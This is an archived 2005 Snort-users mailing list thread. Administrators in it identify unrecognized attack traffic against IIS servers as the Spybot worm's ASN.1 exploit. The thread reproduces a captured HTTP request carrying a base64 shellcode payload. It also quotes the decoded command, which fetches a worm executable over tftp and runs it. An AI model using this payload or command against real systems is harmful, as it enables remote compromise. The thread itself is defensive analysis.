Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Snort-Users
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: [Snort-users] Unrecognized attack patterns against IIS

from [TPanaitescu] Network Security [Permanent Link]
Subject: Re: [Snort-users] Unrecognized attack patterns against IIS
Date: Sat, 11 Jun 2005 12:53:15 -0400 
That's it, "cmd /c tftp -i 0.0.0.0 GET msupdtm.exe&start msupdtm.exe&exit" 
among other things! Good point ! Thanks

Tudor



stephane nasdrovisky <stephane.nasdrovisky@paradigmo.com> 
06/11/2005 12:24 PM

To
TPanaitescu@colorcon.com
cc
Michael Scheidell <scheidell@secnap.net>
Subject
Re: [Snort-users] Unrecognized attack patterns against IIS






Have you tried to base 64 decode this string ( 
http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx )? 
Don't forget the trailing ==.
It looks like http://www.sarc.com/avcenter/venc/data/w32.spybot.pkc.html
The decoded string contains: cmd /c tftp -i 0.0.0.0 GET msupdtm.exe

The worm filename is different in my network neibourhood: cgy32win.exe, 
ms-upd.exe & win-logon.exe (98k -111k)

TPanaitescu@colorcon.com wrote:


Seen that too, it seems that it is a newer "patch" from MS for IE, or 
IEs configured for this, trying to negotiate authorization using 
SPNEGO from the GSS-API.  You can see the packets in full if you use a 
sniffer in front of that web server, I used ethereal and got the info 
below.

Could be an attack also trying to get unauthorized access to a server. 
Anyone with another clue ?


ASN.1 attack.


GET / HTTP/1.0
Host: X.X.X.X
Authorization: Negotiate 


YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
 





UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
 





BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
 





UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
 





BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
 





UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
 





QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
 





FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
 





QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
 





QUFBQUFBQQMAI4IMVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAdAfByg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDMcBki0AwhcB4D4tADItwHK
 





2LaAjpCwAAAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDAuMC4wLjAgR0VUIG1zdXBkdG0uZXhlJnN0YXJ0IG1zdXBkdG0uZXhlJmV4aXQAQkJCQkJCQkJCQkJCQkJCQkJC
 



QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: [Snort-users] Unrecognized attack patterns against IIS, TPanaitescu
Next by Date:  [Snort-users] Port scans detected behind Firewall?, James Bruce
Previous by Thread:  FW: [Snort-users] Unrecognized attack patterns against IIS, Michael Scheidell
Next by Thread:  [Snort-users] Port scans detected behind Firewall?, James Bruce
Indexes:  [Date] [Thread] [Top] [All Lists]